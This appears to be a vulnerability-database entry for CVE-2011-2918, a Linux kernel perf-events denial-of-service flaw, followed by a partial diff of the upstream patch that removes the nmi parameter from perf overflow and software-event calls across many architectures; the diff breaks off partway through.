VYPR
Medium severity5.5NVD Advisory· Published May 24, 2012· Updated Apr 29, 2026

CVE-2011-2918

CVE-2011-2918

Description

The Performance Events subsystem in the Linux kernel before 3.1 does not properly handle event overflows associated with PERF_COUNT_SW_CPU_CLOCK events, which allows local users to cause a denial of service (system hang) via a crafted application.

Affected products

1
  • cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*
    Range: <3.1

Patches

1
a8b0ca17b80e

perf: Remove the nmi parameter from the swevent and overflow interface

https://github.com/torvalds/linuxPeter ZijlstraJun 27, 2011via nvd-ref
46 files changed · +119 141
  • arch/alpha/kernel/perf_event.c+1 1 modified
    @@ -847,7 +847,7 @@ static void alpha_perf_event_irq_handler(unsigned long la_ptr,
     	data.period = event->hw.last_period;
     
     	if (alpha_perf_event_set_period(event, hwc, idx)) {
    -		if (perf_event_overflow(event, 1, &data, regs)) {
    +		if (perf_event_overflow(event, &data, regs)) {
     			/* Interrupts coming too quickly; "throttle" the
     			 * counter, i.e., disable it for a little while.
     			 */
    
  • arch/arm/kernel/perf_event_v6.c+1 1 modified
    @@ -479,7 +479,7 @@ armv6pmu_handle_irq(int irq_num,
     		if (!armpmu_event_set_period(event, hwc, idx))
     			continue;
     
    -		if (perf_event_overflow(event, 0, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			armpmu->disable(hwc, idx);
     	}
     
    
  • arch/arm/kernel/perf_event_v7.c+1 1 modified
    @@ -787,7 +787,7 @@ static irqreturn_t armv7pmu_handle_irq(int irq_num, void *dev)
     		if (!armpmu_event_set_period(event, hwc, idx))
     			continue;
     
    -		if (perf_event_overflow(event, 0, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			armpmu->disable(hwc, idx);
     	}
     
    
  • arch/arm/kernel/perf_event_xscale.c+2 2 modified
    @@ -251,7 +251,7 @@ xscale1pmu_handle_irq(int irq_num, void *dev)
     		if (!armpmu_event_set_period(event, hwc, idx))
     			continue;
     
    -		if (perf_event_overflow(event, 0, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			armpmu->disable(hwc, idx);
     	}
     
    @@ -583,7 +583,7 @@ xscale2pmu_handle_irq(int irq_num, void *dev)
     		if (!armpmu_event_set_period(event, hwc, idx))
     			continue;
     
    -		if (perf_event_overflow(event, 0, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			armpmu->disable(hwc, idx);
     	}
     
    
  • arch/arm/kernel/ptrace.c+1 1 modified
    @@ -396,7 +396,7 @@ static long ptrace_hbp_idx_to_num(int idx)
     /*
      * Handle hitting a HW-breakpoint.
      */
    -static void ptrace_hbptriggered(struct perf_event *bp, int unused,
    +static void ptrace_hbptriggered(struct perf_event *bp,
     				     struct perf_sample_data *data,
     				     struct pt_regs *regs)
     {
    
  • arch/arm/kernel/swp_emulate.c+1 1 modified
    @@ -183,7 +183,7 @@ static int swp_handler(struct pt_regs *regs, unsigned int instr)
     	unsigned int address, destreg, data, type;
     	unsigned int res = 0;
     
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, regs->ARM_pc);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, regs->ARM_pc);
     
     	if (current->pid != previous_pid) {
     		pr_debug("\"%s\" (%ld) uses deprecated SWP{B} instruction\n",
    
  • arch/arm/mm/fault.c+3 3 modified
    @@ -318,11 +318,11 @@ do_page_fault(unsigned long addr, unsigned int fsr, struct pt_regs *regs)
     	fault = __do_page_fault(mm, addr, fsr, tsk);
     	up_read(&mm->mmap_sem);
     
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, addr);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, addr);
     	if (fault & VM_FAULT_MAJOR)
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, 0, regs, addr);
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, regs, addr);
     	else if (fault & VM_FAULT_MINOR)
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, 0, regs, addr);
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, regs, addr);
     
     	/*
     	 * Handle the "normal" case first - VM_FAULT_MAJOR / VM_FAULT_MINOR
    
  • arch/mips/kernel/perf_event.c+1 1 modified
    @@ -527,7 +527,7 @@ handle_associated_event(struct cpu_hw_events *cpuc,
     	if (!mipspmu_event_set_period(event, hwc, idx))
     		return;
     
    -	if (perf_event_overflow(event, 0, data, regs))
    +	if (perf_event_overflow(event, data, regs))
     		mipspmu->disable_event(idx);
     }
     
    
  • arch/mips/kernel/traps.c+4 4 modified
    @@ -578,12 +578,12 @@ static int simulate_llsc(struct pt_regs *regs, unsigned int opcode)
     {
     	if ((opcode & OPCODE) == LL) {
     		perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS,
    -				1, 0, regs, 0);
    +				1, regs, 0);
     		return simulate_ll(regs, opcode);
     	}
     	if ((opcode & OPCODE) == SC) {
     		perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS,
    -				1, 0, regs, 0);
    +				1, regs, 0);
     		return simulate_sc(regs, opcode);
     	}
     
    @@ -602,7 +602,7 @@ static int simulate_rdhwr(struct pt_regs *regs, unsigned int opcode)
     		int rd = (opcode & RD) >> 11;
     		int rt = (opcode & RT) >> 16;
     		perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS,
    -				1, 0, regs, 0);
    +				1, regs, 0);
     		switch (rd) {
     		case 0:		/* CPU number */
     			regs->regs[rt] = smp_processor_id();
    @@ -640,7 +640,7 @@ static int simulate_sync(struct pt_regs *regs, unsigned int opcode)
     {
     	if ((opcode & OPCODE) == SPEC0 && (opcode & FUNC) == SYNC) {
     		perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS,
    -				1, 0, regs, 0);
    +				1, regs, 0);
     		return 0;
     	}
     
    
  • arch/mips/kernel/unaligned.c+2 3 modified
    @@ -111,8 +111,7 @@ static void emulate_load_store_insn(struct pt_regs *regs,
     	unsigned long value;
     	unsigned int res;
     
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS,
    -		      1, 0, regs, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, 0);
     
     	/*
     	 * This load never faults.
    @@ -517,7 +516,7 @@ asmlinkage void do_ade(struct pt_regs *regs)
     	mm_segment_t seg;
     
     	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS,
    -			1, 0, regs, regs->cp0_badvaddr);
    +			1, regs, regs->cp0_badvaddr);
     	/*
     	 * Did we catch a fault trying to load an instruction?
     	 * Or are we running in MIPS16 mode?
    
  • arch/mips/math-emu/cp1emu.c+1 2 modified
    @@ -272,8 +272,7 @@ static int cop1Emulate(struct pt_regs *xcp, struct mips_fpu_struct *ctx,
     	}
     
           emul:
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS,
    -			1, 0, xcp, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, xcp, 0);
     	MIPS_FPU_EMU_INC_STATS(emulated);
     	switch (MIPSInst_OPCODE(ir)) {
     	case ldc1_op:{
    
  • arch/mips/mm/fault.c+3 5 modified
    @@ -145,7 +145,7 @@ asmlinkage void __kprobes do_page_fault(struct pt_regs *regs, unsigned long writ
     	 * the fault.
     	 */
     	fault = handle_mm_fault(mm, vma, address, write ? FAULT_FLAG_WRITE : 0);
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
     	if (unlikely(fault & VM_FAULT_ERROR)) {
     		if (fault & VM_FAULT_OOM)
     			goto out_of_memory;
    @@ -154,12 +154,10 @@ asmlinkage void __kprobes do_page_fault(struct pt_regs *regs, unsigned long writ
     		BUG();
     	}
     	if (fault & VM_FAULT_MAJOR) {
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ,
    -				1, 0, regs, address);
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, regs, address);
     		tsk->maj_flt++;
     	} else {
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN,
    -				1, 0, regs, address);
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, regs, address);
     		tsk->min_flt++;
     	}
     
    
  • arch/powerpc/include/asm/emulated_ops.h+2 2 modified
    @@ -78,14 +78,14 @@ extern void ppc_warn_emulated_print(const char *type);
     #define PPC_WARN_EMULATED(type, regs)					\
     	do {								\
     		perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS,		\
    -			1, 0, regs, 0);					\
    +			1, regs, 0);					\
     		__PPC_WARN_EMULATED(type);				\
     	} while (0)
     
     #define PPC_WARN_ALIGNMENT(type, regs)					\
     	do {								\
     		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS,		\
    -			1, 0, regs, regs->dar);				\
    +			1, regs, regs->dar);				\
     		__PPC_WARN_EMULATED(type);				\
     	} while (0)
     
    
  • arch/powerpc/kernel/perf_event.c+3 3 modified
    @@ -1207,7 +1207,7 @@ struct pmu power_pmu = {
      * here so there is no possibility of being interrupted.
      */
     static void record_and_restart(struct perf_event *event, unsigned long val,
    -			       struct pt_regs *regs, int nmi)
    +			       struct pt_regs *regs)
     {
     	u64 period = event->hw.sample_period;
     	s64 prev, delta, left;
    @@ -1258,7 +1258,7 @@ static void record_and_restart(struct perf_event *event, unsigned long val,
     		if (event->attr.sample_type & PERF_SAMPLE_ADDR)
     			perf_get_data_addr(regs, &data.addr);
     
    -		if (perf_event_overflow(event, nmi, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			power_pmu_stop(event, 0);
     	}
     }
    @@ -1346,7 +1346,7 @@ static void perf_event_interrupt(struct pt_regs *regs)
     		if ((int)val < 0) {
     			/* event has overflowed */
     			found = 1;
    -			record_and_restart(event, val, regs, nmi);
    +			record_and_restart(event, val, regs);
     		}
     	}
     
    
  • arch/powerpc/kernel/perf_event_fsl_emb.c+3 3 modified
    @@ -568,7 +568,7 @@ static struct pmu fsl_emb_pmu = {
      * here so there is no possibility of being interrupted.
      */
     static void record_and_restart(struct perf_event *event, unsigned long val,
    -			       struct pt_regs *regs, int nmi)
    +			       struct pt_regs *regs)
     {
     	u64 period = event->hw.sample_period;
     	s64 prev, delta, left;
    @@ -616,7 +616,7 @@ static void record_and_restart(struct perf_event *event, unsigned long val,
     		perf_sample_data_init(&data, 0);
     		data.period = event->hw.last_period;
     
    -		if (perf_event_overflow(event, nmi, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			fsl_emb_pmu_stop(event, 0);
     	}
     }
    @@ -644,7 +644,7 @@ static void perf_event_interrupt(struct pt_regs *regs)
     			if (event) {
     				/* event has overflowed */
     				found = 1;
    -				record_and_restart(event, val, regs, nmi);
    +				record_and_restart(event, val, regs);
     			} else {
     				/*
     				 * Disabled counter is negative,
    
  • arch/powerpc/kernel/ptrace.c+1 1 modified
    @@ -882,7 +882,7 @@ void user_disable_single_step(struct task_struct *task)
     }
     
     #ifdef CONFIG_HAVE_HW_BREAKPOINT
    -void ptrace_triggered(struct perf_event *bp, int nmi,
    +void ptrace_triggered(struct perf_event *bp,
     		      struct perf_sample_data *data, struct pt_regs *regs)
     {
     	struct perf_event_attr attr;
    
  • arch/powerpc/mm/fault.c+3 3 modified
    @@ -173,7 +173,7 @@ int __kprobes do_page_fault(struct pt_regs *regs, unsigned long address,
     		die("Weird page fault", regs, SIGSEGV);
     	}
     
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
     
     	/* When running in the kernel we expect faults to occur only to
     	 * addresses in user space.  All other faults represent errors in the
    @@ -319,7 +319,7 @@ int __kprobes do_page_fault(struct pt_regs *regs, unsigned long address,
     	}
     	if (ret & VM_FAULT_MAJOR) {
     		current->maj_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, 0,
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1,
     				     regs, address);
     #ifdef CONFIG_PPC_SMLPAR
     		if (firmware_has_feature(FW_FEATURE_CMO)) {
    @@ -330,7 +330,7 @@ int __kprobes do_page_fault(struct pt_regs *regs, unsigned long address,
     #endif
     	} else {
     		current->min_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, 0,
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1,
     				     regs, address);
     	}
     	up_read(&mm->mmap_sem);
    
  • arch/s390/mm/fault.c+3 3 modified
    @@ -299,7 +299,7 @@ static inline int do_exception(struct pt_regs *regs, int access,
     		goto out;
     
     	address = trans_exc_code & __FAIL_ADDR_MASK;
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
     	flags = FAULT_FLAG_ALLOW_RETRY;
     	if (access == VM_WRITE || (trans_exc_code & store_indication) == 0x400)
     		flags |= FAULT_FLAG_WRITE;
    @@ -345,11 +345,11 @@ static inline int do_exception(struct pt_regs *regs, int access,
     	if (flags & FAULT_FLAG_ALLOW_RETRY) {
     		if (fault & VM_FAULT_MAJOR) {
     			tsk->maj_flt++;
    -			perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, 0,
    +			perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1,
     				      regs, address);
     		} else {
     			tsk->min_flt++;
    -			perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, 0,
    +			perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1,
     				      regs, address);
     		}
     		if (fault & VM_FAULT_RETRY) {
    
  • arch/sh/kernel/ptrace_32.c+1 1 modified
    @@ -63,7 +63,7 @@ static inline int put_stack_long(struct task_struct *task, int offset,
     	return 0;
     }
     
    -void ptrace_triggered(struct perf_event *bp, int nmi,
    +void ptrace_triggered(struct perf_event *bp,
     		      struct perf_sample_data *data, struct pt_regs *regs)
     {
     	struct perf_event_attr attr;
    
  • arch/sh/kernel/traps_32.c+1 1 modified
    @@ -393,7 +393,7 @@ int handle_unaligned_access(insn_size_t instruction, struct pt_regs *regs,
     	 */
     	if (!expected) {
     		unaligned_fixups_notify(current, instruction, regs);
    -		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, 0,
    +		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1,
     			      regs, address);
     	}
     
    
  • arch/sh/kernel/traps_64.c+4 4 modified
    @@ -434,7 +434,7 @@ static int misaligned_load(struct pt_regs *regs,
     		return error;
     	}
     
    -	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, regs, address);
     
     	destreg = (opcode >> 4) & 0x3f;
     	if (user_mode(regs)) {
    @@ -512,7 +512,7 @@ static int misaligned_store(struct pt_regs *regs,
     		return error;
     	}
     
    -	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, regs, address);
     
     	srcreg = (opcode >> 4) & 0x3f;
     	if (user_mode(regs)) {
    @@ -588,7 +588,7 @@ static int misaligned_fpu_load(struct pt_regs *regs,
     		return error;
     	}
     
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, address);
     
     	destreg = (opcode >> 4) & 0x3f;
     	if (user_mode(regs)) {
    @@ -665,7 +665,7 @@ static int misaligned_fpu_store(struct pt_regs *regs,
     		return error;
     	}
     
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, address);
     
     	srcreg = (opcode >> 4) & 0x3f;
     	if (user_mode(regs)) {
    
  • arch/sh/math-emu/math.c+1 1 modified
    @@ -620,7 +620,7 @@ int do_fpu_inst(unsigned short inst, struct pt_regs *regs)
     	struct task_struct *tsk = current;
     	struct sh_fpu_soft_struct *fpu = &(tsk->thread.xstate->softfpu);
     
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, 0);
     
     	if (!(task_thread_info(tsk)->status & TS_USEDFPU)) {
     		/* initialize once. */
    
  • arch/sh/mm/fault_32.c+3 3 modified
    @@ -160,7 +160,7 @@ asmlinkage void __kprobes do_page_fault(struct pt_regs *regs,
     	if ((regs->sr & SR_IMASK) != SR_IMASK)
     		local_irq_enable();
     
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
     
     	/*
     	 * If we're in an interrupt, have no user context or are running
    @@ -210,11 +210,11 @@ asmlinkage void __kprobes do_page_fault(struct pt_regs *regs,
     	}
     	if (fault & VM_FAULT_MAJOR) {
     		tsk->maj_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, 0,
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1,
     				     regs, address);
     	} else {
     		tsk->min_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, 0,
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1,
     				     regs, address);
     	}
     
    
  • arch/sh/mm/tlbflush_64.c+3 3 modified
    @@ -116,7 +116,7 @@ asmlinkage void do_page_fault(struct pt_regs *regs, unsigned long writeaccess,
     	/* Not an IO address, so reenable interrupts */
     	local_irq_enable();
     
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
     
     	/*
     	 * If we're in an interrupt or have no user
    @@ -200,11 +200,11 @@ asmlinkage void do_page_fault(struct pt_regs *regs, unsigned long writeaccess,
     
     	if (fault & VM_FAULT_MAJOR) {
     		tsk->maj_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, 0,
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1,
     				     regs, address);
     	} else {
     		tsk->min_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, 0,
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1,
     				     regs, address);
     	}
     
    
  • arch/sparc/kernel/perf_event.c+1 1 modified
    @@ -1277,7 +1277,7 @@ static int __kprobes perf_event_nmi_handler(struct notifier_block *self,
     		if (!sparc_perf_event_set_period(event, hwc, idx))
     			continue;
     
    -		if (perf_event_overflow(event, 1, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			sparc_pmu_stop(event, 0);
     	}
     
    
  • arch/sparc/kernel/unaligned_32.c+2 2 modified
    @@ -247,7 +247,7 @@ asmlinkage void kernel_unaligned_trap(struct pt_regs *regs, unsigned int insn)
     		unsigned long addr = compute_effective_address(regs, insn);
     		int err;
     
    -		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, 0, regs, addr);
    +		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, regs, addr);
     		switch (dir) {
     		case load:
     			err = do_int_load(fetch_reg_addr(((insn>>25)&0x1f),
    @@ -338,7 +338,7 @@ asmlinkage void user_unaligned_trap(struct pt_regs *regs, unsigned int insn)
     		}
     
     		addr = compute_effective_address(regs, insn);
    -		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, 0, regs, addr);
    +		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, regs, addr);
     		switch(dir) {
     		case load:
     			err = do_int_load(fetch_reg_addr(((insn>>25)&0x1f),
    
  • arch/sparc/kernel/unaligned_64.c+6 6 modified
    @@ -317,7 +317,7 @@ asmlinkage void kernel_unaligned_trap(struct pt_regs *regs, unsigned int insn)
     
     		addr = compute_effective_address(regs, insn,
     						 ((insn >> 25) & 0x1f));
    -		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, 0, regs, addr);
    +		perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, regs, addr);
     		switch (asi) {
     		case ASI_NL:
     		case ASI_AIUPL:
    @@ -384,7 +384,7 @@ int handle_popc(u32 insn, struct pt_regs *regs)
     	int ret, i, rd = ((insn >> 25) & 0x1f);
     	int from_kernel = (regs->tstate & TSTATE_PRIV) != 0;
     	                        
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, 0);
     	if (insn & 0x2000) {
     		maybe_flush_windows(0, 0, rd, from_kernel);
     		value = sign_extend_imm13(insn);
    @@ -431,7 +431,7 @@ int handle_ldf_stq(u32 insn, struct pt_regs *regs)
     	int asi = decode_asi(insn, regs);
     	int flag = (freg < 32) ? FPRS_DL : FPRS_DU;
     
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, 0);
     
     	save_and_clear_fpu();
     	current_thread_info()->xfsr[0] &= ~0x1c000;
    @@ -554,7 +554,7 @@ void handle_ld_nf(u32 insn, struct pt_regs *regs)
     	int from_kernel = (regs->tstate & TSTATE_PRIV) != 0;
     	unsigned long *reg;
     	                        
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, 0);
     
     	maybe_flush_windows(0, 0, rd, from_kernel);
     	reg = fetch_reg_addr(rd, regs);
    @@ -586,7 +586,7 @@ void handle_lddfmna(struct pt_regs *regs, unsigned long sfar, unsigned long sfsr
     
     	if (tstate & TSTATE_PRIV)
     		die_if_kernel("lddfmna from kernel", regs);
    -	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, 0, regs, sfar);
    +	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, regs, sfar);
     	if (test_thread_flag(TIF_32BIT))
     		pc = (u32)pc;
     	if (get_user(insn, (u32 __user *) pc) != -EFAULT) {
    @@ -647,7 +647,7 @@ void handle_stdfmna(struct pt_regs *regs, unsigned long sfar, unsigned long sfsr
     
     	if (tstate & TSTATE_PRIV)
     		die_if_kernel("stdfmna from kernel", regs);
    -	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, 0, regs, sfar);
    +	perf_sw_event(PERF_COUNT_SW_ALIGNMENT_FAULTS, 1, regs, sfar);
     	if (test_thread_flag(TIF_32BIT))
     		pc = (u32)pc;
     	if (get_user(insn, (u32 __user *) pc) != -EFAULT) {
    
  • arch/sparc/kernel/visemul.c+1 1 modified
    @@ -802,7 +802,7 @@ int vis_emul(struct pt_regs *regs, unsigned int insn)
     
     	BUG_ON(regs->tstate & TSTATE_PRIV);
     
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, 0);
     
     	if (test_thread_flag(TIF_32BIT))
     		pc = (u32)pc;
    
  • arch/sparc/math-emu/math_32.c+1 1 modified
    @@ -164,7 +164,7 @@ int do_mathemu(struct pt_regs *regs, struct task_struct *fpt)
     	int retcode = 0;                               /* assume all succeed */
     	unsigned long insn;
     
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, 0);
     
     #ifdef DEBUG_MATHEMU
     	printk("In do_mathemu()... pc is %08lx\n", regs->pc);
    
  • arch/sparc/math-emu/math_64.c+1 1 modified
    @@ -184,7 +184,7 @@ int do_mathemu(struct pt_regs *regs, struct fpustate *f)
     
     	if (tstate & TSTATE_PRIV)
     		die_if_kernel("unfinished/unimplemented FPop from kernel", regs);
    -	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, 0, regs, 0);
    +	perf_sw_event(PERF_COUNT_SW_EMULATION_FAULTS, 1, regs, 0);
     	if (test_thread_flag(TIF_32BIT))
     		pc = (u32)pc;
     	if (get_user(insn, (u32 __user *) pc) != -EFAULT) {
    
  • arch/sparc/mm/fault_32.c+3 5 modified
    @@ -251,7 +251,7 @@ asmlinkage void do_sparc_fault(struct pt_regs *regs, int text_fault, int write,
             if (in_atomic() || !mm)
                     goto no_context;
     
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
     
     	down_read(&mm->mmap_sem);
     
    @@ -301,12 +301,10 @@ asmlinkage void do_sparc_fault(struct pt_regs *regs, int text_fault, int write,
     	}
     	if (fault & VM_FAULT_MAJOR) {
     		current->maj_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, 0,
    -			      regs, address);
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, regs, address);
     	} else {
     		current->min_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, 0,
    -			      regs, address);
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, regs, address);
     	}
     	up_read(&mm->mmap_sem);
     	return;
    
  • arch/sparc/mm/fault_64.c+3 5 modified
    @@ -325,7 +325,7 @@ asmlinkage void __kprobes do_sparc64_fault(struct pt_regs *regs)
     	if (in_atomic() || !mm)
     		goto intr_or_no_mm;
     
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
     
     	if (!down_read_trylock(&mm->mmap_sem)) {
     		if ((regs->tstate & TSTATE_PRIV) &&
    @@ -433,12 +433,10 @@ asmlinkage void __kprobes do_sparc64_fault(struct pt_regs *regs)
     	}
     	if (fault & VM_FAULT_MAJOR) {
     		current->maj_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, 0,
    -			      regs, address);
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, regs, address);
     	} else {
     		current->min_flt++;
    -		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, 0,
    -			      regs, address);
    +		perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, regs, address);
     	}
     	up_read(&mm->mmap_sem);
     
    
  • arch/x86/kernel/cpu/perf_event.c+1 1 modified
    @@ -1339,7 +1339,7 @@ static int x86_pmu_handle_irq(struct pt_regs *regs)
     		if (!x86_perf_event_set_period(event))
     			continue;
     
    -		if (perf_event_overflow(event, 1, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			x86_pmu_stop(event, 0);
     	}
     
    
  • arch/x86/kernel/cpu/perf_event_intel.c+1 1 modified
    @@ -1003,7 +1003,7 @@ static int intel_pmu_handle_irq(struct pt_regs *regs)
     
     		data.period = event->hw.last_period;
     
    -		if (perf_event_overflow(event, 1, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			x86_pmu_stop(event, 0);
     	}
     
    
  • arch/x86/kernel/cpu/perf_event_intel_ds.c+2 2 modified
    @@ -340,7 +340,7 @@ static int intel_pmu_drain_bts_buffer(void)
     	 */
     	perf_prepare_sample(&header, &data, event, &regs);
     
    -	if (perf_output_begin(&handle, event, header.size * (top - at), 1, 1))
    +	if (perf_output_begin(&handle, event, header.size * (top - at), 1))
     		return 1;
     
     	for (; at < top; at++) {
    @@ -616,7 +616,7 @@ static void __intel_pmu_pebs_event(struct perf_event *event,
     	else
     		regs.flags &= ~PERF_EFLAGS_EXACT;
     
    -	if (perf_event_overflow(event, 1, &data, &regs))
    +	if (perf_event_overflow(event, &data, &regs))
     		x86_pmu_stop(event, 0);
     }
     
    
  • arch/x86/kernel/cpu/perf_event_p4.c+1 1 modified
    @@ -970,7 +970,7 @@ static int p4_pmu_handle_irq(struct pt_regs *regs)
     
     		if (!x86_perf_event_set_period(event))
     			continue;
    -		if (perf_event_overflow(event, 1, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			x86_pmu_stop(event, 0);
     	}
     
    
  • arch/x86/kernel/kgdb.c+1 1 modified
    @@ -608,7 +608,7 @@ int kgdb_arch_init(void)
     	return register_die_notifier(&kgdb_notifier);
     }
     
    -static void kgdb_hw_overflow_handler(struct perf_event *event, int nmi,
    +static void kgdb_hw_overflow_handler(struct perf_event *event,
     		struct perf_sample_data *data, struct pt_regs *regs)
     {
     	struct task_struct *tsk = current;
    
  • arch/x86/kernel/ptrace.c+1 1 modified
    @@ -528,7 +528,7 @@ static int genregs_set(struct task_struct *target,
     	return ret;
     }
     
    -static void ptrace_triggered(struct perf_event *bp, int nmi,
    +static void ptrace_triggered(struct perf_event *bp,
     			     struct perf_sample_data *data,
